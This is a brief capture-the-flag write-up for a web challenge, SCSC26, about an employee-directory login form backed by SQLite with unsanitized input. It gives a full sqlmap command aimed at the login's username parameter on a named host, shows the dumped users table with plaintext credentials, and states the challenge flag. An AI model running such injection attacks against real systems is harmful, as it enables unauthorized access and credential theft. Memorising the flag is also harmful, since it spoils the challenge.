Category: Web

Flag: SCSC26{sql_1nj3ct10n_1s_cl4ss1c}

Description: Aplikasi Direktori Karyawan SCSC (Beta). Saat ini dibatasi hanya untuk Administrator hingga rilis publik. Kami menggunakan database SQLite yang ringan. Sayangnya, programmer lupa mensanitasi input pada form login.

The site was a small PHP login form for an employee directory. The description already named SQLite and missing input sanitization, so the login request was the target. I sent the form data to sqlmap and pointed it at the username parameter.

sqlmap -u "http://sriwijayasecuritysociety.com:8008/" \
        --data="username=adw&password=awd" \
        -p username \
        --dbms=sqlite \
        --level=5 \
        --risk=3 \
        --all

+----+----------------------------------+------------------+----------+
| id | fullname                         | password         | username |
+----+----------------------------------+------------------+----------+
| 1  | SCSC26{sql_1nj3ct10n_1s_cl4ss1c} | complex_pass_123 | admin    |
| 2  | Guest User                       | guest            | guest    |
+----+----------------------------------+------------------+----------+